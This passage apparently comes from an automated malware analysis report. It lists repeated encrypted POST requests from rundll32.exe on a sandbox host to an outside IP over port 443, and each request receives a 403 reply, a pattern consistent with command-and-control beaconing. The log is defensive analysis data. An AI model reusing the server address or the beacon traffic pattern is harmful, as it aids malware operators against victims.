                                                                                                      2021-10-28 02:54:13 UTC148OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:14 UTC157INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.349873192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:13 UTC153OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:13 UTC153OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:14 UTC158INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.349880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:17 UTC158OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:17 UTC158OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:18 UTC167INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.349881192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:17 UTC162OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:17 UTC163OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:18 UTC167INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.349907192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:21 UTC168OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:21 UTC168OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:22 UTC177INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.349909192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:21 UTC172OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:21 UTC172OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:22 UTC177INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.349931192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:25 UTC177OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:25 UTC178OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:26 UTC187INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.349932192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:25 UTC182OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:25 UTC182OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:26 UTC187INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.349941192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:29 UTC187OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:29 UTC187OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:29 UTC197INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.349942192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:29 UTC192OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:29 UTC192OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:29 UTC197INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.349758192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:21 UTC19OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:21 UTC19OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:22 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.349949192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:33 UTC197OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:33 UTC197OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:33 UTC207INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.349950192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:33 UTC202OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:33 UTC202OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:33 UTC207INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.349957192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:36 UTC207OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
